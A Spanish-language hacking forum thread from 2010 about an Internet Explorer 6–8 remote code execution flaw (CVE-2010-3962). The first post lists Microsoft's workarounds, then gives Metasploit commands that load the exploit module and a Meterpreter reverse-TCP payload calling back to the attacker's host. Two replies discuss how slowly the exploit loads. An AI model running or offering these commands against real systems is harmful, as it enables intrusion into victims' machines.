elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Únete al Grupo Steam elhacker.NET


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  [0 Day] RCE en Internet Explorer 6, 7 y 8
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: [0 Day] RCE en Internet Explorer 6, 7 y 8  (Leído 2,472 veces)
Shell Root
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.723


<3


Ver Perfil WWW
[0 Day] RCE en Internet Explorer 6, 7 y 8
« en: 24 Diciembre 2010, 17:31 pm »

[0 Day] RCE en Internet Explorer 6, 7 y 8


INFORMACIÓN
Microsoft publicó un boletín informando de una vulnerabilidad (CVE-2010-3962) que afecta a varias de las versiones soportadas de su navegador Internet Explorer 6, 7 y 8; la cual están investigando y por el momento no tiene un parche de solución.

El principal impacto que puede generar esta vulnerabilidad es la ejecución remota de código (RCE -Remote Code Execution-).

El boletín de Microsoft provee soluciones provisionales para evitar la amenaza, las cuales son:

  • Evitar el estilo CSS del sitio usando estilos CSS definidos por el usuario
  • Utilizar el kit de herramientas EMET
  • Utilizar la protección DEP para IE 7
  • Leer correos en modo texto
  • Fijar las zonas de Intranet e Internet en modo de seguridad “Alto” para bloquear los controles ActiveX y el Active Scripting en esas zonas.

También se informa que el Internet Explorer 9 (Beta) no es afectado y se puede usar sin problemas. En el caso de Internet Explorer 8 en su instalación con valores por defecto es poco probable que sea afectado ya que ofrece la protección DEP.




El módulo explota una vulnerabilidad de corrupción de memoria en el motor HTML de Microsoft (MSHTML). Al analizar una página HTML que contiene una etiqueta especialmente diseñada en CSS provoca la corrupción de memoria lo que conlleva a la ejecución de código arbitrario.

Exploit
Código
  1. use exploit/windows/browser/ms10_xxx_ie_css_clip

Payload
Código
  1. set PAYLOAD windows/meterpreter/reverse_tcp

Comandos del Metasploit
Código
  1. use exploit/windows/browser/ms10_xxx_ie_css_ clip
  2. set SRVHOST IP
  3. set payload windows/meterpreter/reverse_tcp
  4. set LHOST IP
  5. exploit

Video
Debido a algunos problemas con mis máquinas virtuales, opté por poner un vídeo de un tercero.



Visto en: :http://daw-labs.com/rce-en-internet-explorer-6-7-y-8/
En línea

Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.
EvilGoblin


Desconectado Desconectado

Mensajes: 2.323


YO NO LA VOTE!


Ver Perfil
Re: [0 Day] RCE en Internet Explorer 6, 7 y 8
« Respuesta #1 en: 28 Diciembre 2010, 16:21 pm »

corrupcion de memoria? lo que significa que debe estar abierta la pagina unos 2 minutos hasta cargar el exploit ¿?¿
En línea

Experimental Serial Lain [Linux User]
.:WindHack:.

Desconectado Desconectado

Mensajes: 167

Prisionero de mi propia mente...


Ver Perfil WWW
Re: [0 Day] RCE en Internet Explorer 6, 7 y 8
« Respuesta #2 en: 28 Diciembre 2010, 17:56 pm »

corrupcion de memoria? lo que significa que debe estar abierta la pagina unos 2 minutos hasta cargar el exploit ¿?¿

Exactamente, es algo demorada la ejecución del exploit y en algunos casos no se completa la carga de manera correcta.
En línea

Follow me on Twitter: @windhack | Visit my website: www.daw-labs.com

"The only thing they can't take from us are our minds."
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines